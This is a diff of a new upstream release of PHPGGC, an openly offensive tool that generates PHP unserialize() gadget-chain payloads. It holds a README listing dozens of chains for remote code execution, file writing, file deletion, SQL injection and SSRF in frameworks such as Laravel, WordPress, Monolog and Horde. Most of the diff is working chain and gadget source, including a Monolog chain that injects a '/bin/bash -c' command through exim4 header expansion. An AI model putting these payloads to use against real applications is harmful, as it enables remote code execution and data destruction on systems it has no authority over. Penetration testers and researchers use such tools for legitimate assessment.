Codebase list phpggc / a334346
New upstream version 0.20210218 Arnaud Rebillout 3 years ago
104 changed file(s) with 2075 addition(s) and 148 deletion(s). Raw diff Collapse all Expand all
+9
-0
Dockerfile less more
0 FROM php:7.4-cli-alpine AS builder
1
2 COPY . /phpggc
3
4 WORKDIR /phpggc
5
6 RUN chmod +x phpggc && echo "phar.readonly=0" > $PHP_INI_DIR/php.ini
7
8 ENTRYPOINT ["/phpggc/phpggc"]
+99
-43
README.md less more
11
22 *PHPGGC is a library of unserialize() payloads along with a tool to generate them, from command line or programmatically*.
33 When encountering an unserialize on a website you don't have the code of, or simply when trying to build an exploit, this tool allows you to generate the payload without having to go through the tedious steps of finding gadgets and combining them. It can be seen as the equivalent of [frohoff's ysoserial](https://github.com/frohoff/ysoserial), but for PHP.
4 Currently, the tool supports: CodeIgniter4, Doctrine, Drupal7, Guzzle, Laravel, Magento, Monolog, Phalcon, Podio, Slim, SwiftMailer, Symfony, Wordpress, Yii and ZendFramework.
4 Currently, the tool supports gadget chains such as: CodeIgniter4, Doctrine, Drupal7, Guzzle, Laravel, Magento, Monolog, Phalcon, Podio, Slim, SwiftMailer, Symfony, Wordpress, Yii and ZendFramework.
55
66
77 ## Requirements
88
99 PHP >= 5.6 is required to run PHPGGC.
10 PHP 8 is not yet supported.
1011
1112
1213 ## Usage
1920 Gadget Chains
2021 -------------
2122
22 NAME VERSION TYPE VECTOR I
23 CodeIgniter4/RCE1 4.0.0-beta.1 <= ? rce __destruct
24 Doctrine/FW1 ? file_write __toString *
25 Drupal7/FD1 7.0 < ? file_delete __destruct *
26 Drupal7/RCE1 7.0.8 < ? rce __destruct *
27 Guzzle/FW1 6.0.0 <= 6.3.3+ file_write __destruct
28 Guzzle/INFO1 6.0.0 <= 6.3.2 phpinfo() __destruct *
29 Guzzle/RCE1 6.0.0 <= 6.3.2 rce __destruct *
30 Laravel/RCE1 5.4.27 rce __destruct
31 Laravel/RCE2 5.5.39 rce __destruct
32 Laravel/RCE3 5.5.39 rce __destruct *
33 Laravel/RCE4 5.5.39 rce __destruct
34 Laravel/RCE5 5.8.30 rce __destruct *
35 Laravel/RCE6 5.5.* rce __destruct *
36 Magento/FW1 ? <= 1.9.4.0 file_write __destruct *
37 Magento/SQLI1 ? <= 1.9.4.0 sql_injection __destruct
38 Monolog/RCE1 1.18 <= 1.23 rce __destruct
39 Monolog/RCE2 1.5 <= 1.17 rce __destruct
40 Phalcon/RCE1 <= 1.2.2 rce __wakeup *
41 Pydio/Guzzle/RCE1 < 8.2.2 rce __toString
42 Slim/RCE1 3.8.1 rce __toString
43 SwiftMailer/FD1 -5.4.12+, -6.2.1+ file_delete __destruct
44 SwiftMailer/FW1 5.1.0 <= 5.4.8 file_write __toString
45 SwiftMailer/FW2 6.0.0 <= 6.0.1 file_write __toString
46 SwiftMailer/FW3 5.0.1 file_write __toString
47 SwiftMailer/FW4 4.0.0 <= ? file_write __destruct
48 Symfony/FW1 2.5.2 file_write DebugImport *
49 Symfony/FW2 3.4 file_write __destruct
50 Symfony/RCE1 3.3 rce __destruct *
51 Symfony/RCE2 2.3.42 < 2.6 rce __destruct *
52 Symfony/RCE3 2.6 <= 2.8.32 rce __destruct *
53 Symfony/RCE4 3.4.0-34, 4.2.0-11, 4.3.0-7 rce __destruct *
54 ThinkPHP/RCE1 5.1.x-5.2.x rce __destruct *
55 WordPress/Guzzle/RCE1 4.0.0 <= 6.4.1+ rce __toString *
56 WordPress/Guzzle/RCE2 4.0.0 <= 6.4.1+ rce __destruct *
57 WordPress/P/WooCommerce/RCE1 3.4.0 <= 3.6.2+ rce __destruct *
58 WordPress/P/YetAnotherStarsRating/RCE1 ? <= 1.8.6 rce __destruct *
59 Yii/RCE1 1.1.20 rce __wakeup *
60 ZendFramework/FD1 ? <= 1.12.20 file_delete __destruct
61 ZendFramework/RCE1 ? <= 1.12.20 rce __destruct *
62 ZendFramework/RCE2 1.11.12 <= 1.12.20 rce __toString *
63 ZendFramework/RCE3 2.0.1 <= ? rce __destruct
23 NAME VERSION TYPE VECTOR I
24 CodeIgniter4/RCE1 4.0.0-beta.1 <= 4.0.0-rc.4 RCE (Function call) __destruct
25 CodeIgniter4/RCE2 4.0.0-rc.4 <= 4.0.4+ RCE (Function call) __destruct
26 Doctrine/FW1 ? File write __toString *
27 Drupal7/FD1 7.0 < ? File delete __destruct *
28 Drupal7/RCE1 7.0.8 < ? RCE (Function call) __destruct *
29 Guzzle/FW1 6.0.0 <= 6.3.3+ File write __destruct
30 Guzzle/INFO1 6.0.0 <= 6.3.2 phpinfo() __destruct *
31 Guzzle/RCE1 6.0.0 <= 6.3.2 RCE (Function call) __destruct *
32 Horde/RCE1 <= 5.2.22 RCE (PHP code) __destruct *
33 Laminas/FD1 <= 2.11.2 File delete __destruct
34 Laravel/RCE1 5.4.27 RCE (Function call) __destruct
35 Laravel/RCE2 5.5.39 RCE (Function call) __destruct
36 Laravel/RCE3 5.5.39 RCE (Function call) __destruct *
37 Laravel/RCE4 5.5.39 RCE (Function call) __destruct
38 Laravel/RCE5 5.8.30 RCE (PHP code) __destruct *
39 Laravel/RCE6 5.5.* RCE (PHP code) __destruct *
40 Laravel/RCE7 ? <= 8.16.1 RCE (Function call) __destruct *
41 Magento/FW1 ? <= 1.9.4.0 File write __destruct *
42 Magento/SQLI1 ? <= 1.9.4.0 SQL injection __destruct
43 Monolog/RCE1 1.18 <= 2.1.1+ RCE (Function call) __destruct
44 Monolog/RCE2 1.5 <= 2.1.1+ RCE (Function call) __destruct
45 Monolog/RCE3 1.1.0 <= 1.10.0 RCE (Function call) __destruct
46 Monolog/RCE4 ? <= 2.4.4+ RCE (Command) __destruct *
47 Phalcon/RCE1 <= 1.2.2 RCE __wakeup *
48 PHPCSFixer/FD1 <= 2.17.3 File delete __destruct
49 PHPCSFixer/FD2 <= 2.17.3 File delete __destruct
50 PHPExcel/FD1 1.8.2+ File delete __destruct
51 PHPExcel/FD2 <= 1.8.1 File delete __destruct
52 PHPExcel/FD3 1.8.2+ File delete __destruct
53 PHPExcel/FD4 <= 1.8.1 File delete __destruct
54 Pydio/Guzzle/RCE1 < 8.2.2 RCE (Function call) __toString
55 Slim/RCE1 3.8.1 RCE (Function call) __toString
56 Smarty/FD1 ? File delete __destruct
57 Smarty/SSRF1 ? SSRF __destruct *
58 SwiftMailer/FD1 -5.4.12+, -6.2.1+ File delete __destruct
59 SwiftMailer/FW1 5.1.0 <= 5.4.8 File write __toString
60 SwiftMailer/FW2 6.0.0 <= 6.0.1 File write __toString
61 SwiftMailer/FW3 5.0.1 File write __toString
62 SwiftMailer/FW4 4.0.0 <= ? File write __destruct
63 Symfony/FW1 2.5.2 File write DebugImport *
64 Symfony/FW2 3.4 File write __destruct
65 Symfony/RCE1 3.3 RCE (Command) __destruct *
66 Symfony/RCE2 2.3.42 < 2.6 RCE (PHP code) __destruct *
67 Symfony/RCE3 2.6 <= 2.8.32 RCE (PHP code) __destruct *
68 Symfony/RCE4 3.4.0-34, 4.2.0-11, 4.3.0-7 RCE (Function call) __destruct *
69 TCPDF/FD1 <= 6.3.5 File delete __destruct *
70 ThinkPHP/RCE1 5.1.x-5.2.x RCE (Function call) __destruct *
71 WordPress/Dompdf/RCE1 0.8.5+ & WP < 5.5.2 RCE (Function call) __destruct *
72 WordPress/Dompdf/RCE2 0.7.0 <= 0.8.4 & WP < 5.5.2 RCE (Function call) __destruct *
73 WordPress/Guzzle/RCE1 4.0.0 <= 6.4.1+ & WP < 5.5.2 RCE (Function call) __toString *
74 WordPress/Guzzle/RCE2 4.0.0 <= 6.4.1+ & WP < 5.5.2 RCE (Function call) __destruct *
75 WordPress/P/EmailSubscribers/RCE1 4.0 <= 4.4.7+ & WP < 5.5.2 RCE (Function call) __destruct *
76 WordPress/P/EverestForms/RCE1 1.0 <= 1.6.7+ & WP < 5.5.2 RCE (Function call) __destruct *
77 WordPress/P/WooCommerce/RCE1 3.4.0 <= 4.1.0+ & WP < 5.5.2 RCE (Function call) __destruct *
78 WordPress/P/WooCommerce/RCE2 <= 3.4.0 & WP < 5.5.2 RCE (Function call) __destruct *
79 WordPress/P/YetAnotherStarsRating/RCE1 ? <= 1.8.6 & WP < 5.5.2 RCE (Function call) __destruct *
80 WordPress/PHPExcel/RCE1 1.8.2+ & WP < 5.5.2 RCE (Function call) __toString *
81 WordPress/PHPExcel/RCE2 <= 1.8.1 & WP < 5.5.2 RCE (Function call) __toString *
82 WordPress/PHPExcel/RCE3 1.8.2+ & WP < 5.5.2 RCE (Function call) __destruct *
83 WordPress/PHPExcel/RCE4 <= 1.8.1 & WP < 5.5.2 RCE (Function call) __destruct *
84 WordPress/PHPExcel/RCE5 1.8.2+ & WP < 5.5.2 RCE (Function call) __destruct *
85 WordPress/PHPExcel/RCE6 <= 1.8.1 & WP < 5.5.2 RCE (Function call) __destruct *
86 Yii/RCE1 1.1.20 RCE (Function call) __wakeup *
87 Yii2/RCE1 <2.0.38 RCE (Function call) __destruct *
88 Yii2/RCE2 <2.0.38 RCE (PHP code) __destruct *
89 ZendFramework/FD1 ? <= 1.12.20 File delete __destruct
90 ZendFramework/RCE1 ? <= 1.12.20 RCE (PHP code) __destruct *
91 ZendFramework/RCE2 1.11.12 <= 1.12.20 RCE (Function call) __toString *
92 ZendFramework/RCE3 2.0.1 <= ? RCE (Function call) __destruct
93 ZendFramework/RCE4 ? <= 1.12.20 RCE (PHP code) __destruct *
94
95 ```
96
97 Filter gadget chains:
98
99 ```
100 $ ./phpggc -l laravel
101
102 Gadget Chains
103 -------------
104
105 NAME VERSION TYPE VECTOR I
106 Laravel/RCE1 5.4.27 RCE (Function call) __destruct
107 Laravel/RCE2 5.5.39 RCE (Function call) __destruct
108 Laravel/RCE3 5.5.39 RCE (Function call) __destruct *
109 Laravel/RCE4 5.5.39 RCE (Function call) __destruct
110 Laravel/RCE5 5.8.30 RCE (PHP code) __destruct *
111 Laravel/RCE6 5.5.* RCE (PHP code) __destruct *
112 Laravel/RCE7 ? <= 8.16.1 RCE (Function call) __destruct *
64113
65114 ```
66115
139188 a:1:{s:7:"message";O:18:"Slim\Http\Response":2:{...}}
140189 ```
141190
191
142192 ## PHAR(GGC)
143193
144194 ### History
254304 For instance, use `./phpggc -n Drupal RCE` would create a new Drupal RCE gadgetchain.
255305
256306
307
308 ## Docker
309
310 If you don't want to install PHP, you can use `docker build`.
311
312
257313 # License
258314
259315 [Apache License 2.0](LICENSE)
+3
-3
gadgetchains/CodeIgniter4/RCE/1/chain.php less more
11
22 namespace GadgetChain\CodeIgniter4;
33
4 class RCE1 extends \PHPGGC\GadgetChain\RCE
4 class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall
55 {
6 public static $version = '4.0.0-beta.1 <= ?';
6 public static $version = '4.0.0-beta.1 <= 4.0.0-rc.4';
77 public static $vector = '__destruct';
88 public static $author = 'eboda';
99
1414
1515 return new \CodeIgniter\Cache\Handlers\RedisHandler($function, $parameter);
1616 }
17 }
17 }
+1
-2
gadgetchains/CodeIgniter4/RCE/1/gadgets.php less more
00 <?php
1
12 namespace CodeIgniter\Cache\Handlers {
23 class RedisHandler {
34 protected $redis;
6667 class BaseBuilder {
6768 }
6869 }
69
70
+18
-0
gadgetchains/CodeIgniter4/RCE/2/chain.php less more
0 <?php
1
2 namespace GadgetChain\CodeIgniter4;
3
4 class RCE2 extends \PHPGGC\GadgetChain\RCE\FunctionCall
5 {
6 public static $version = '4.0.0-rc.4 <= 4.0.4+'; // tested on 4.0.0-rc.4, 4.0.3 & 4.0.4
7 public static $vector = '__destruct';
8 public static $author = 'eboda';
9
10 public function generate(array $parameters)
11 {
12 $function = $parameters['function'];
13 $parameter = $parameters['parameter'];
14
15 return new \CodeIgniter\Cache\Handlers\RedisHandler($function, $parameter);
16 }
17 }
+88
-0
gadgetchains/CodeIgniter4/RCE/2/gadgets.php less more
0 <?php
1
2 namespace CodeIgniter\Cache\Handlers {
3 class RedisHandler {
4 protected $redis;
5
6 public function __construct($func, $param) {
7 $this->redis = new \CodeIgniter\Session\Handlers\MemcachedHandler(
8 new \CodeIgniter\Model(
9 new \CodeIgniter\Database\BaseBuilder(
10 new \CodeIgniter\Database\MySQLi\Connection
11 ),
12 new \CodeIgniter\Validation\Validation,
13 $func,
14 new \CodeIgniter\Database\MySQLi\Connection
15 ),
16 array("x" => $param)
17 );
18 }
19 }
20 }
21
22 namespace CodeIgniter\Session\Handlers {
23 class MemcachedHandler {
24 protected $memcached;
25 protected $lockKey;
26
27 public function __construct($memcached, $param) {
28 $this->lockKey = $param;
29 $this->memcached = $memcached;
30 }
31 }
32 }
33
34 namespace CodeIgniter {
35 class Model {
36 protected $builder;
37 protected $primaryKey;
38 protected $beforeDelete;
39 protected $validationRules;
40 protected $validation;
41 protected $tempAllowCallbacks;
42
43 public function __construct($builder, $validation, $func, $db) {
44 $this->builder = $builder;
45 $this->primaryKey = null;
46
47 $this->beforeDelete = array();
48 $this->beforeDelete[] = "validate";
49
50 $this->tempAllowCallbacks = 1;
51 $this->db = $db;
52
53 $this->cleanValidationRules = false;
54 $this->validation = $validation;
55 $this->validationRules = array(
56 "id.x" => array(
57 "rules" => array($func, "dd") // function "dd" exits the script.
58 )
59 );
60 }
61 }
62 }
63
64 namespace CodeIgniter\Validation {
65 class Validation {
66 protected $ruleSetFiles;
67
68 public function __construct() {
69 $this->ruleSetFiles = array("finfo");
70 }
71 }
72 }
73
74 namespace CodeIgniter\Database {
75 class BaseBuilder {
76 public function __construct($db) {
77 $this->QBFrom = array("()");
78 $this->db = $db;
79 }
80 }
81 }
82
83 namespace CodeIgniter\Database\MySQLi {
84 class Connection {
85 }
86 }
87
+1
-1
gadgetchains/Doctrine/FW/1/chain.php less more
1515 public static $version = '?';
1616 public static $vector = '__toString';
1717 public static $author = 'cf';
18 public static $informations = '
18 public static $information = '
1919 We do not have full control of the path. If you enter
2020 /var/www/toto/shell.php as the remote_path, it will be converted to
2121 /var/www/toto/e3/5b737464436c61737324434c4153534d455441444154415d5b315d.php.
+1
-1
gadgetchains/Drupal7/FD/1/chain.php less more
66 public static $version = '7.0 < ?';
77 public static $vector = '__destruct';
88 public static $author = 'rreiss';
9 public static $informations = '
9 public static $information = '
1010 Note that some files may not be removed (depends on permissions)
1111 ';
1212
+2
-2
gadgetchains/Drupal7/RCE/1/chain.php less more
11
22 namespace GadgetChain\Drupal7;
33
4 class RCE1 extends \PHPGGC\GadgetChain\RCE
4 class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall
55 {
66 public static $version = '7.0.8 < ?';
77 public static $vector = '__destruct';
88 public static $author = 'Blaklis';
9 public static $informations = 'You will need to post form_build_id=DrupalRCE to /?q=system/ajax once the payload is unserialized';
9 public static $information = 'You will need to post form_build_id=DrupalRCE to /?q=system/ajax once the payload is unserialized';
1010
1111 public function generate(array $parameters)
1212 {
+1
-1
gadgetchains/Guzzle/INFO/1/chain.php less more
66 public static $version = '6.0.0 <= 6.3.2';
77 public static $vector = '__destruct';
88 public static $author = 'erwan_lr';
9 public static $informations = '
9 public static $information = '
1010 This chain requires GuzzleHttp\Psr7 < 1.5.0, because FnStream cannot be
1111 deserialized afterwards.
1212 See https://github.com/ambionics/phpggc/issues/34
+2
-2
gadgetchains/Guzzle/RCE/1/chain.php less more
11
22 namespace GadgetChain\Guzzle;
33
4 class RCE1 extends \PHPGGC\GadgetChain\RCE
4 class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall
55 {
66 public static $version = '6.0.0 <= 6.3.2';
77 public static $vector = '__destruct';
88 public static $author = 'proclnas';
9 public static $informations = '
9 public static $information = '
1010 This chain requires GuzzleHttp\Psr7 < 1.5.0, because FnStream cannot be
1111 deserialized afterwards.
1212 See https://github.com/ambionics/phpggc/issues/34
+22
-0
gadgetchains/Horde/RCE/1/chain.php less more
0 <?php
1
2 namespace GadgetChain\Horde;
3
4 class RCE1 extends \PHPGGC\GadgetChain\RCE\PHPCode
5 {
6 public static $version = '<= 5.2.22';
7 public static $vector = '__destruct';
8 public static $foundby = 'EgiX';
9 public static $author = 'mr_me';
10 public static $information = '
11 This chain was used against 34 different 0day endpoints targeting Horde v5.2.22. Other versions are probably affected
12 See https://srcincite.io/blog/2020/08/19/a-smorgashorde-of-vulnerabilities-a-comparative-analysis-of-discovery.html
13 ';
14
15 public function generate(array $parameters)
16 {
17 $code = $parameters['code'] . ';die;';
18 return new \Horde_Kolab_Server_Decorator_Clean($code);
19 }
20 }
21 ?>
+60
-0
gadgetchains/Horde/RCE/1/gadgets.php less more
0 <?php
1
2 class Horde_Config
3 {
4 protected $_oldConfig;
5 function __construct($code)
6 {
7 $this->_oldConfig = $code;
8 }
9 }
10
11 class Horde_Prefs_Scope implements Serializable
12 {
13 protected $_prefs = array(1);
14 protected $scope;
15 public function serialize()
16 {
17 return json_encode(array(
18 $this->scope,
19 $this->_prefs
20 ));
21 }
22
23 public function unserialize($data)
24 {
25 list($this->scope, $this->_prefs) = json_decode($data, true);
26 }
27 }
28
29 class Horde_Prefs
30 {
31 protected $_opts, $_scopes;
32 function __construct($code)
33 {
34 $this->_opts['sizecallback'] = array(new Horde_Config($code), 'readXMLConfig');
35 $this->_scopes['horde'] = new Horde_Prefs_Scope;
36 }
37 }
38
39 class Horde_Prefs_Identity
40 {
41 protected $_prefs, $_prefnames, $_identities;
42 function __construct($code)
43 {
44 $this->_identities = array(0);
45 $this->_prefs = new Horde_Prefs($code);
46 $this->_prefnames['identities'] = 0;
47 }
48 }
49
50 class Horde_Kolab_Server_Decorator_Clean
51 {
52 private $_server, $_added;
53 function __construct($code)
54 {
55 $this->_added = array(0);
56 $this->_server = new Horde_Prefs_Identity($code);
57 }
58 }
59 ?>
+17
-0
gadgetchains/Laminas/FD/1/chain.php less more
0 <?php
1
2 namespace GadgetChain\Laminas;
3
4 class FD1 extends \PHPGGC\GadgetChain\FileDelete
5 {
6 public static $version = '<= 2.11.2';
7 public static $vector = '__destruct';
8 public static $author = 'MrTuxracer';
9
10 public function generate(array $parameters)
11 {
12 $remote_file = $parameters["remote_file"];
13
14 return new \Laminas\Http\Response\Stream($remote_file);
15 }
16 }
+9
-0
gadgetchains/Laminas/FD/1/gadgets.php less more
0 <?php
1 namespace Laminas\Http\Response {
2 class Stream {
3 function __construct($remote_file) {
4 $this->cleanup = '1';
5 $this->streamName = $remote_file;
6 }
7 }
8 }
+1
-1
gadgetchains/Laravel/RCE/1/chain.php less more
11
22 namespace GadgetChain\Laravel;
33
4 class RCE1 extends \PHPGGC\GadgetChain\RCE
4 class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall
55 {
66 public static $version = '5.4.27';
77 public static $vector = '__destruct';
+1
-1
gadgetchains/Laravel/RCE/2/chain.php less more
11
22 namespace GadgetChain\Laravel;
33
4 class RCE2 extends \PHPGGC\GadgetChain\RCE
4 class RCE2 extends \PHPGGC\GadgetChain\RCE\FunctionCall
55 {
66 public static $version = '5.5.39';
77 public static $vector = '__destruct';
+2
-2
gadgetchains/Laravel/RCE/3/chain.php less more
11
22 namespace GadgetChain\Laravel;
33
4 class RCE3 extends \PHPGGC\GadgetChain\RCE
4 class RCE3 extends \PHPGGC\GadgetChain\RCE\FunctionCall
55 {
66 public static $version = '5.5.39';
77 public static $vector = '__destruct';
88 public static $author = 'BlackFan';
9 public static $informations = 'This chain triggers an ErrorException after code execution.';
9 public static $information = 'This chain triggers an ErrorException after code execution.';
1010
1111 public function generate(array $parameters)
1212 {
+1
-1
gadgetchains/Laravel/RCE/4/chain.php less more
11
22 namespace GadgetChain\Laravel;
33
4 class RCE4 extends \PHPGGC\GadgetChain\RCE
4 class RCE4 extends \PHPGGC\GadgetChain\RCE\FunctionCall
55 {
66 public static $version = '5.5.39';
77 public static $vector = '__destruct';
+2
-5
gadgetchains/Laravel/RCE/5/chain.php less more
11
22 namespace GadgetChain\Laravel;
33
4 class RCE5 extends \PHPGGC\GadgetChain\RCE
4 class RCE5 extends \PHPGGC\GadgetChain\RCE\PHPCode
55 {
66 public static $version = '5.8.30';
77 public static $vector = '__destruct';
88 public static $author = 'Phith0n';
9 public static $informations = '
9 public static $information = '
1010 Executes given PHP code through eval().
1111 Requires Mockery, which is in the require-dev package.
1212 ';
13 public static $parameters = [
14 'code'
15 ];
1613
1714 public function generate(array $parameters)
1815 {
+2
-2
gadgetchains/Laravel/RCE/6/chain.php less more
11
22 namespace GadgetChain\Laravel;
33
4 class RCE6 extends \PHPGGC\GadgetChain\RCE
4 class RCE6 extends \PHPGGC\GadgetChain\RCE\PHPCode
55 {
66 public static $version = '5.5.*';
77 public static $vector = '__destruct';
88 public static $author = 'Phith0n & holyvier';
9 public static $informations = '
9 public static $information = '
1010 Executes given PHP code through eval().
1111 Requires Mockery, which is in the require-dev package.
1212 ';
+22
-0
gadgetchains/Laravel/RCE/7/chain.php less more
0 <?php
1
2 namespace GadgetChain\Laravel;
3
4 class RCE7 extends \PHPGGC\GadgetChain\RCE\FunctionCall
5 {
6 public static $version = '? <= 8.16.1'; // will test for more version at a later date
7 public static $vector = '__destruct';
8 public static $author = 'whira';
9 public static $information = 'This chain throws a RuntimeException immediately after code execution.';
10
11 public function generate(array $parameters)
12 {
13 $function = $parameters['function'];
14 $parameter = $parameters['parameter'];
15
16 return new \Illuminate\Broadcasting\PendingBroadcast(
17 $function,
18 $parameter
19 );
20 }
21 }
+45
-0
gadgetchains/Laravel/RCE/7/gadgets.php less more
0 <?php
1
2 namespace Illuminate\Broadcasting
3 {
4 class PendingBroadcast
5 {
6 protected $events;
7 protected $event;
8
9 public function __construct($function, $parameter)
10 {
11 $this->events = new \Illuminate\Bus\Dispatcher($function);
12 $this->event = new \Illuminate\Queue\CallQueuedClosure($parameter);
13 }
14 }
15 }
16
17 namespace Illuminate\Bus
18 {
19 class Dispatcher
20 {
21 protected $queueResolver;
22
23 public function __construct($function)
24 {
25 $this->queueResolver = $function;
26
27 }
28 }
29 }
30
31 namespace Illuminate\Queue
32 {
33 class CallQueuedClosure
34 {
35 protected $connection;
36
37 public function __construct($parameter)
38 {
39 $this->connection = $parameter;
40 }
41 }
42 }
43
44
+1
-1
gadgetchains/Magento/FW/1/chain.php less more
66 public static $version = '? <= 1.9.4.0';
77 public static $vector = '__destruct';
88 public static $author = 'eboda';
9 public static $informations = 'The <remote_path> is either relative to the Magento root or absolute. The payload will throw an error during unserialization, but the file is written anyway.';
9 public static $information = 'The <remote_path> is either relative to the Magento root or absolute. The payload will throw an error during unserialization, but the file is written anyway.';
1010
1111 public function generate(array $parameters)
1212 {
+3
-3
gadgetchains/Monolog/RCE/1/chain.php less more
11
22 namespace GadgetChain\Monolog;
33
4 class RCE1 extends \PHPGGC\GadgetChain\RCE
4 class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall
55 {
6 public static $version = '1.18 <= 1.23';
6 public static $version = '1.18 <= 2.1.1+';
77 public static $vector = '__destruct';
88 public static $author = 'cf';
99
1919 )
2020 );
2121 }
22 }
22 }
+2
-2
gadgetchains/Monolog/RCE/2/chain.php less more
11
22 namespace GadgetChain\Monolog;
33
4 class RCE2 extends \PHPGGC\GadgetChain\RCE
4 class RCE2 extends \PHPGGC\GadgetChain\RCE\FunctionCall
55 {
6 public static $version = '1.5 <= 1.17';
6 public static $version = '1.5 <= 2.1.1+';
77 public static $vector = '__destruct';
88 public static $author = 'cf';
99
+21
-0
gadgetchains/Monolog/RCE/3/chain.php less more
0 <?php
1
2 namespace GadgetChain\Monolog;
3
4 class RCE3 extends \PHPGGC\GadgetChain\RCE\FunctionCall
5 {
6 public static $version = '1.1.0 <= 1.10.0';
7 public static $vector = '__destruct';
8 public static $author = 'theBumble';
9
10 public function generate(array $parameters)
11 {
12 $function = $parameters['function'];
13 $parameter = $parameters['parameter'];
14
15 return new \Monolog\Handler\BufferHandler(
16 ['current', $function],
17 [$parameter, 'level' => null]
18 );
19 }
20 }
+40
-0
gadgetchains/Monolog/RCE/3/gadgets.php less more
0 <?php
1
2 namespace Monolog\Handler
3 {
4 class NativeMailerHandler {
5 protected $to = null;
6 protected $subject = null;
7 protected $headers = null;
8
9 protected $level = null;
10 protected $bubble = false;
11 protected $formatter = null;
12 protected $processors;
13
14 function __construct($methods) {
15 $this->processors = $methods;
16
17 }
18 }
19
20 class BufferHandler
21 {
22 protected $handler;
23 protected $bufferSize = -1;
24 protected $buffer;
25
26 # ($record['level'] < $this->level) == false
27 protected $level = null;
28 protected $bubble = false;
29 protected $formatter = null;
30 protected $processors;
31
32 function __construct($methods, $command)
33 {
34 $this->processors = null;
35 $this->buffer = [$command];
36 $this->handler = new NativeMailerHandler($methods);
37 }
38 }
39 }
+27
-0
gadgetchains/Monolog/RCE/4/chain.php less more
0 <?php
1
2 namespace GadgetChain\Monolog;
3
4 class RCE4 extends \PHPGGC\GadgetChain\RCE\Command
5 {
6 public static $version = '? <= 2.4.4+';
7 public static $vector = '__destruct';
8 public static $author = 'whira';
9 public static $information = '
10 This chain will target debian based distribution (exim4 MTA) as it will perform a command injection on mail()
11 and use exim4 extended strings, the payload is `/bin/bash -c "$command"`.
12 As this GC requires a setup that is specific, you should have better results by running Monolog/RCE1 or
13 Monolog/RCE2 instead.
14 ';
15
16 public function generate(array $parameters)
17 {
18 $command = $parameters['command'];
19
20 return new \Monolog\Handler\RollbarHandler(
21 new \Monolog\Handler\BufferHandler(
22 new \Monolog\Handler\NativeMailerHandler($command)
23 )
24 );
25 }
26 }
+73
-0
gadgetchains/Monolog/RCE/4/gadgets.php less more
0 <?php
1
2 namespace Monolog\Handler
3 {
4 class RollbarHandler
5 {
6 private $hasRecords;
7 protected $rollbarLogger;
8
9 public function __construct($buffer)
10 {
11 $this->hasRecords = true;
12 $this->rollbarLogger = $buffer;
13 }
14 }
15
16 class BufferHandler
17 {
18 protected $bufferSize;
19 protected $handler;
20 protected $buffer;
21
22 public function __construct($buffer)
23 {
24 $this->bufferSize = 2;
25 $this->handler = $buffer;
26 $this->buffer = [0 => array("level" => 100,
27 "message" => 1,
28 "context" => [],
29 "extra" => [],
30 "channel" => 1)];
31 }
32 }
33
34 class NativeMailerHandler
35 {
36 protected $level;
37 protected $processors;
38 protected $formatter;
39 protected $maxColumnWidth;
40 protected $parameters;
41 protected $to;
42 protected $headers;
43
44 public function __construct($command)
45 {
46 $this->level = 1;
47 $this->processors = ["array_reverse"];
48 // if $this->buffer[0] is carefully crafted
49 // $this->format can be used to pass a payload through the 'body' parameter
50 // via the LineFormatter
51 // Here we used the headers param to pass the payload
52 $this->formatter = new \Monolog\Formatter\LineFormatter();
53 $this->maxColumnWidth = 20;
54 $this->parameters = ["-be"];
55 $this->headers = ['${run{/bin/bash -c "'.$command.'"}{yes}{no}}'];
56 $this->to = ["init@localhost"];
57 }
58 }
59 }
60
61 namespace Monolog\Formatter
62 {
63 class LineFormatter
64 {
65 protected $format;
66 public function __construct()
67 {
68 $this->format = "";
69 }
70 }
71 }
72
+17
-0
gadgetchains/PHPCSFixer/FD/1/chain.php less more
0 <?php
1 namespace GadgetChain\PHPCSFixer;
2
3 class FD1 extends \PHPGGC\GadgetChain\FileDelete
4 {
5 public static $version = '<= 2.17.3';
6 public static $vector = '__destruct';
7 public static $author = 'snoopysecurity';
8
9 public function generate(array $parameters)
10 {
11 $remote_file = $parameters["remote_file"];
12
13 return new \PhpCsFixer\FileRemoval($remote_file);
14 }
15 }
16
+43
-0
gadgetchains/PHPCSFixer/FD/1/gadgets.php less more
0 <?php
1
2 namespace PhpCsFixer
3 {
4 //https://github.com/FriendsOfPHP/PHP-CS-Fixer/blob/v2.17.3/src/FileRemoval.php
5 class FileRemoval
6 {
7
8 function __construct($remote_file)
9 {
10 $this->files = [$remote_file => $remote_file];
11
12 }
13
14 }
15 }
16
17 /*
18 public function __destruct()
19 {
20 $this->clean();
21 }
22
23
24
25
26 public function clean()
27 {
28 foreach ($this->files as $file => $value) {
29 $this->unlink($file);
30 }
31 $this->files = [];
32 }
33
34 private function unlink($path)
35 {
36 @unlink($path);
37 }
38 }
39 */
40
41
42 ?>
+17
-0
gadgetchains/PHPCSFixer/FD/2/chain.php less more
0 <?php
1
2 namespace GadgetChain\PHPCSFixer;
3
4 class FD2 extends \PHPGGC\GadgetChain\FileDelete
5 {
6 public static $version = '<= 2.17.3';
7 public static $vector = '__destruct';
8 public static $author = 'snoopysecurity';
9
10 public function generate(array $parameters)
11 {
12 $remote_file = $parameters["remote_file"];
13
14 return new \PhpCsFixer\Linter\ProcessLinter($remote_file);
15 }
16 }
+62
-0
gadgetchains/PHPCSFixer/FD/2/gadgets.php less more
0 <?php
1 namespace PhpCsFixer\Linter
2 {
3 //https://github.com/FriendsOfPHP/PHP-CS-Fixer/blob/v2.17.3/src/Linter/ProcessLinter.php
4 class ProcessLinter
5 {
6
7 function __construct($remote_file)
8 {
9 $this->temporaryFile = $remote_file;
10 $this->fileRemoval = new \PhpCsFixer\FileRemoval();
11
12 }
13
14 /*
15 public function __destruct()
16 {
17 if (null !== $this->temporaryFile) {
18 $this->fileRemoval->delete($this->temporaryFile);
19 }
20 }
21 */
22
23 }
24 }
25
26 namespace PhpCsFixer
27 {
28
29 //https://github.com/FriendsOfPHP/PHP-CS-Fixer/blob/v2.17.3/src/FileRemoval.php
30 class FileRemoval
31
32 {
33
34 public function delete($path)
35 {
36 if (isset($this->files[$path]))
37 {
38 unset($this->files[$path]);
39 }
40 $this->unlink($path);
41 }
42 private function unlink($path)
43 {
44 @unlink($path);
45 }
46
47 }
48 }
49
50 /*
51 public function delete($path)
52 {
53 if (isset($this->files[$path])) {
54 unset($this->files[$path]);
55 }
56 $this->unlink($path);
57 }
58
59 */
60
61 ?>
+15
-0
